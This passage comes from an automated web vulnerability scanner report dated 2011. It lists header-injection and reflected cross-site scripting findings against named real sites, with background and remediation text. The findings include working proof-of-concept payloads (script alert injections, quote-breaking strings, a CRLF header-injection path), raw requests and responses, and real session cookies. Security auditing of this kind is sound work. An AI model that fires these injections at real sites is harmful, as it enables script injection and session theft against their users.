Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

Request

GET /7cb05%0d%0a98d04ffcdd0/connectedplanet.iclick.com/adtarget;subss=;subs=news;area=bss_oss;site=connectedplanet;kw=;sz=640x480;pos=introstitial;spon=;ord=63786.06336656958 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/7cb05
98d04ffcdd0/connectedplanet.iclick.com/adtarget;subss=;subs=news;area=bss_oss;site=connectedplanet;kw=;sz=640x480;pos=introstitial;spon=;ord=63786.06336656958:
Date: Thu, 12 May 2011 00:49:48 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3. Cross-site scripting (reflected) previous next
There are 31 instances of this issue:

http://ds.addthis.com/red/psi/sites/nanpa.org/p.json [callback parameter]
http://img.mediaplex.com/content/0/12688/127209/SP_IPv6_640x480_timer.js [mpck parameter]
http://img.mediaplex.com/content/0/12688/127209/SP_IPv6_640x480_timer.js [mpck parameter]
http://img.mediaplex.com/content/0/12688/127209/SP_IPv6_640x480_timer.js [mpvc parameter]
http://img.mediaplex.com/content/0/12688/127209/SP_IPv6_640x480_timer.js [mpvc parameter]
http://nanpa.org/about_overview.php [REST URL parameter 1]
http://nanpa.org/awards_overview.php [REST URL parameter 1]
http://nanpa.org/education_overview.php [REST URL parameter 1]
http://nanpa.org/favicon.ico [REST URL parameter 1]
http://nanpa.org/history.php [REST URL parameter 1]
http://nanpa.org/recent_forum_posts.php [REST URL parameter 1]
http://syndicate.industryclick.com/feedmix/connected_planet_all_with_teaser/heds.js [count parameter]
http://syndicate.industryclick.com/feedmix/connected_planet_all_with_teaser/heds.js [pool parameter]
http://syndicate.industryclick.com/feedmix/connected_planet_bss_oss/heds.js [count parameter]
http://syndicate.industryclick.com/feedmix/connected_planet_bss_oss/heds.js [pool parameter]
http://www.911enable.com/business/contact_specialist.php [name of an arbitrarily supplied request parameter]
http://www.911enable.com/business/contact_specialist.php [provenance parameter]
http://www.commpartnersconnect.com/company [REST URL parameter 1]
http://www.commpartnersconnect.com/company [number parameter]
http://www.commpartnersconnect.com/favicon.ico [REST URL parameter 1]
http://www.etalkup.com/formjsforoneutf8.aspx [workgroup parameter]
http://www.etalkup.com/getpanelsdk.aspx [workgroup parameter]
http://www.nanpa.org/favicon.ico [REST URL parameter 1]
http://www.nanpa.org/forums/external.php [REST URL parameter 1]
http://www.nanpa.org/forums/external.php [REST URL parameter 2]
http://www.nanpa.org/viewers/scroller_x.swf [REST URL parameter 1]
http://www.nanpa.org/viewers/scroller_x.swf [REST URL parameter 2]
https://www.nationalnanpa.com/nas/security/user_reg_pre_mail.do [userStageModel.emailAddr parameter]
http://www.redskye911.com/e911_information_center/default.aspx [_TSM_HiddenField_ parameter]
http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/ [Referer HTTP header]
http://seg.sharethis.com/getSegment.php [__stid cookie]

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

3.1. http://ds.addthis.com/red/psi/sites/nanpa.org/p.json [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ds.addthis.com
Path:	/red/psi/sites/nanpa.org/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload c7cf3<script>alert(1)</script>85e81b10871 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/nanpa.org/p.json?callback=_ate.ad.hprc7cf3<script>alert(1)</script>85e81b10871&uid=4dab4fa85facd099&url=http%3A%2F%2Fnanpa.org%2Fabout_overview.php&ref=http%3A%2F%2Fnanpa.org%2F&1otax1h HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; dt=X; di=%7B%7D..1305126976.1FE|1305126976.1OD|1305126976.60; psc=4; uid=4dab4fa85facd099

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Thu, 12 May 2011 00:04:23 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sat, 11 Jun 2011 00:04:23 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Thu, 12 May 2011 00:04:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 12 May 2011 00:04:23 GMT
Connection: close

_ate.ad.hprc7cf3<script>alert(1)</script>85e81b10871({"urls":[],"segments" : [],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

3.2. http://img.mediaplex.com/content/0/12688/127209/SP_IPv6_640x480_timer.js [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/12688/127209/SP_IPv6_640x480_timer.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2985c"-alert(1)-"00cb3ba448f was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/12688/127209/SP_IPv6_640x480_timer.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F12688-127209-4062-0%3Fmpt%3D69779922985c"-alert(1)-"00cb3ba448f&mpt=6977992&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b05/3/0/%2a/g%3B240931323%3B0-0%3B1%3B44107191%3B1412-640/480%3B42045209/42062996/1%3B%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=13198:5934/13305:22136/17263:25710/17113:25710/16186:22724/15368:22624/16228:16454/10105:1629/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:48:37 GMT
Server: Apache
Last-Modified: Sat, 16 Apr 2011 01:07:44 GMT
ETag: "6cd3c7-f61-4a0fec92ab800"
Accept-Ranges: bytes
Content-Length: 4747
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
mpcclick = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F12688-127209-4062-0%3Fmpt%3D69779922985c"-alert(1)-"00cb3ba448f");
mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F12688-127209-4062-0%3Fmpt%3D69779922985c"-alert(1)-"00cb3ba448f");
mpck = "ht
...[SNIP]...

3.3. http://img.mediaplex.com/content/0/12688/127209/SP_IPv6_640x480_timer.js [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/12688/127209/SP_IPv6_640x480_timer.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79a8d'%3balert(1)//6e9127e7ac0 was submitted in the mpck parameter. This input was echoed as 79a8d';alert(1)//6e9127e7ac0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/12688/127209/SP_IPv6_640x480_timer.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F12688-127209-4062-0%3Fmpt%3D697799279a8d'%3balert(1)//6e9127e7ac0&mpt=6977992&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b05/3/0/%2a/g%3B240931323%3B0-0%3B1%3B44107191%3B1412-640/480%3B42045209/42062996/1%3B%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=13198:5934/13305:22136/17263:25710/17113:25710/16186:22724/15368:22624/16228:16454/10105:1629/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:48:39 GMT
Server: Apache
Last-Modified: Sat, 16 Apr 2011 01:07:44 GMT
ETag: "6cd3c7-f61-4a0fec92ab800"
Accept-Ranges: bytes
Content-Length: 4753
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<a href="http://ad.doubleclick.net/click;h=v8/3b05/3/0/*/g;240931323;0-0;1;44107191;1412-640/480;42045209/42062996/1;;~sscs=?http://altfarm.mediaplex.com/ad/ck/12688-127209-4062-0?mpt=697799279a8d';alert(1)//6e9127e7ac0" target="_blank">
...[SNIP]...

3.4. http://img.mediaplex.com/content/0/12688/127209/SP_IPv6_640x480_timer.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/12688/127209/SP_IPv6_640x480_timer.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b8682"%3balert(1)//c72977f9130 was submitted in the mpvc parameter. This input was echoed as b8682";alert(1)//c72977f9130 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/12688/127209/SP_IPv6_640x480_timer.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F12688-127209-4062-0%3Fmpt%3D6977992&mpt=6977992&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b05/3/0/%2a/g%3B240931323%3B0-0%3B1%3B44107191%3B1412-640/480%3B42045209/42062996/1%3B%3B%7Esscs%3D%3fb8682"%3balert(1)//c72977f9130 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=13198:5934/13305:22136/17263:25710/17113:25710/16186:22724/15368:22624/16228:16454/10105:1629/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:49:34 GMT
Server: Apache
Last-Modified: Sat, 16 Apr 2011 01:07:44 GMT
ETag: "6cd3c7-f61-4a0fec92ab800"
Accept-Ranges: bytes
Content-Length: 4749
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<mpvce/>';
if (mpvce == 1) {
mpvclick = encodeURIComponent("http://ad.doubleclick.net/click;h=v8/3b05/3/0/*/g;240931323;0-0;1;44107191;1412-640/480;42045209/42062996/1;;~sscs=?b8682";alert(1)//c72977f9130");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("http://ad.doubleclick.net/click;h=v8/3b05/3/0/*/g;240931323;0-0;1;44107191;1412-640/480;42045209/42062996/1;;~sscs=?b8682";
...[SNIP]...

3.5. http://img.mediaplex.com/content/0/12688/127209/SP_IPv6_640x480_timer.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/12688/127209/SP_IPv6_640x480_timer.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c994'%3balert(1)//62b09341242 was submitted in the mpvc parameter. This input was echoed as 4c994';alert(1)//62b09341242 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/12688/127209/SP_IPv6_640x480_timer.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F12688-127209-4062-0%3Fmpt%3D6977992&mpt=6977992&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b05/3/0/%2a/g%3B240931323%3B0-0%3B1%3B44107191%3B1412-640/480%3B42045209/42062996/1%3B%3B%7Esscs%3D%3f4c994'%3balert(1)//62b09341242 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=13198:5934/13305:22136/17263:25710/17113:25710/16186:22724/15368:22624/16228:16454/10105:1629/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:49:36 GMT
Server: Apache
Last-Modified: Sat, 16 Apr 2011 01:07:44 GMT
ETag: "6cd3c7-f61-4a0fec92ab800"
Accept-Ranges: bytes
Content-Length: 4749
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<a href="http://ad.doubleclick.net/click;h=v8/3b05/3/0/*/g;240931323;0-0;1;44107191;1412-640/480;42045209/42062996/1;;~sscs=?4c994';alert(1)//62b09341242http://altfarm.mediaplex.com/ad/ck/12688-127209-4062-0?mpt=6977992" target="_blank">
...[SNIP]...

3.6. http://nanpa.org/about_overview.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://nanpa.org
Path:	/about_overview.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 55190<script>alert(1)</script>17c6ad3db83 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about_overview.php55190<script>alert(1)</script>17c6ad3db83 HTTP/1.1
Host: nanpa.org
Proxy-Connection: keep-alive
Referer: http://nanpa.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsize=12

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 00:04:27 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 20834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<span class="redtext">http://nanpa.org/about_overview.php55190<script>alert(1)</script>17c6ad3db83</span>
...[SNIP]...

3.7. http://nanpa.org/awards_overview.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://nanpa.org
Path:	/awards_overview.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d88e0<script>alert(1)</script>66b1f6a06d6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /awards_overview.phpd88e0<script>alert(1)</script>66b1f6a06d6 HTTP/1.1
Host: nanpa.org
Proxy-Connection: keep-alive
Referer: http://nanpa.org/education_overview.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsize=12

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 00:05:10 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 20835

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<span class="redtext">http://nanpa.org/awards_overview.phpd88e0<script>alert(1)</script>66b1f6a06d6</span>
...[SNIP]...

3.8. http://nanpa.org/education_overview.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://nanpa.org
Path:	/education_overview.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 593f4<script>alert(1)</script>c968a8dfd53 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /education_overview.php593f4<script>alert(1)</script>c968a8dfd53 HTTP/1.1
Host: nanpa.org
Proxy-Connection: keep-alive
Referer: http://nanpa.org/history.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsize=12

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 00:05:07 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 20838

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<span class="redtext">http://nanpa.org/education_overview.php593f4<script>alert(1)</script>c968a8dfd53</span>
...[SNIP]...

3.9. http://nanpa.org/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://nanpa.org
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cd47a<script>alert(1)</script>0e5c60d2086 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icocd47a<script>alert(1)</script>0e5c60d2086 HTTP/1.1
Host: nanpa.org
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsize=12

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 00:05:35 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 20827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<span class="redtext">http://nanpa.org/favicon.icocd47a<script>alert(1)</script>0e5c60d2086</span>
...[SNIP]...

3.10. http://nanpa.org/history.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://nanpa.org
Path:	/history.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fd331<script>alert(1)</script>6930481ebe4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /history.phpfd331<script>alert(1)</script>6930481ebe4 HTTP/1.1
Host: nanpa.org
Proxy-Connection: keep-alive
Referer: http://nanpa.org/about_overview.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsize=12

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 00:05:01 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 20827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<span class="redtext">http://nanpa.org/history.phpfd331<script>alert(1)</script>6930481ebe4</span>
...[SNIP]...

3.11. http://nanpa.org/recent_forum_posts.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://nanpa.org
Path:	/recent_forum_posts.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d9a60<script>alert(1)</script>dec3bb51a6f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /recent_forum_posts.phpd9a60<script>alert(1)</script>dec3bb51a6f HTTP/1.1
Host: nanpa.org
Proxy-Connection: keep-alive
Referer: http://nanpa.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 00:03:56 GMT
Server: Apache
